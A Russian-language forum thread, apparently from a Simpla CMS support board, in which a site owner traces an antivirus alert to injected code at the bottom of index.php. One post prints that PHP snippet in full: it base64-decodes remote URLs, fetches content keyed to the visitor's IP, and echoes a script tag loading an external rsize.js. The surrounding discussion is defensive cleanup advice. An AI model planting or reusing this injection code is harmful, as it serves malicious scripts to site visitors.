trump Posted April 4, 2013 Report Share Posted April 4, 2013 Сегодня обнаружил, что сайт заражен вот такой дрянью JS.IFrame.387. Не могу найти убежище этого iFrame, может кто сталкивался, подскажите, где сидит этот зверь?Причем между моими ссылка сайта drWeb почему-то проверил сторонний. Где-то стоит редирект?Проверка:http://edgdlfd.homeunix.net/rsize.jsРазмер файла:394 байтMD5 файла:ebb93d0725496d8f8c7f47430f164cd4http://edgdlfd.homeunix.net/rsize.js infected with JS.IFrame.387 Quote Link to post Share on other sites
HotHeadMan Posted April 4, 2013 Report Share Posted April 4, 2013 index.php в корне сайта смотрели? Quote Link to post Share on other sites
Noxter Posted April 4, 2013 Report Share Posted April 4, 2013 rsize.js нет такого файла в симпле, сносите Quote Link to post Share on other sites
trump Posted April 4, 2013 Author Report Share Posted April 4, 2013 Тема закрыта, нашел вредоносный код в index.php в самом низу, антивирус больше не ругается. Ура!function sql2_safe($in) { $rtn = base64_decode($in); return $rtn;}function collectnewss() { if (!isset($_COOKIE["iJijkdaMnerys"])) { $value = 'yadeor'; $ip = $_SERVER['REMOTE_ADDR']; $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip; $file = @fopen ($get, "r"); $content = @fread($file, 1000); @setcookie("iJijkdaMnerys", $value, time()+3600*24); if (!$content) echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4="); else echo $content; }}collectnewss (); Quote Link to post Share on other sites
trump Posted April 4, 2013 Author Report Share Posted April 4, 2013 Да, я после того как пост написал, еще раз в индекс заглянул, он там оказался, а я рыл все файлы с расширением *.js Из-за чего это могло случится? Какие меры принимать, кроме смены паролей, дабы предотвратить такие ситуации? А то сегодня пара клиентов пожаловались, мол антивирус сигналит, троян на сайте.. Quote Link to post Share on other sites
HotHeadMan Posted April 4, 2013 Report Share Posted April 4, 2013 Переодически проверяйте тот файл, у меня недавно там же было такое http://forum.simplacms.ru/discussion/4199/vredonosnyy-kod#Item_6 Quote Link to post Share on other sites
HotHeadMan Posted April 4, 2013 Report Share Posted April 4, 2013 Когда антивир ругается — это еще полбеды, а когда поисковик обнаружит — выключит весь сайт из поиска. Quote Link to post Share on other sites
trump Posted April 4, 2013 Author Report Share Posted April 4, 2013 Да, вот это будет точно залет)) Спасибо, рад, что на этом форуме есть адекватные люди, которые помогают советами, а не корчат из себя умников отсылая на яндекс. Quote Link to post Share on other sites
SV911 Posted April 5, 2013 Report Share Posted April 5, 2013 trumpУ кого то из местных программистов был доступ к фтп твоего сайта? Quote Link to post Share on other sites
trump Posted April 9, 2013 Author Report Share Posted April 9, 2013 @SV911, нет, не было, я не пользуюсь ничьими услугами.. И доступ только у меня есть. Quote Link to post Share on other sites
trump Posted April 9, 2013 Author Report Share Posted April 9, 2013 Никто не сталкивался, как уместить комментарии VK, Facebook и стандартный симпла посредством переключаемых табов? Типа будет 3 вкладки, нажимаешь, к примеру на ссылочку Facebook и переключается на нужный виджет комментирования. Quote Link to post Share on other sites
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.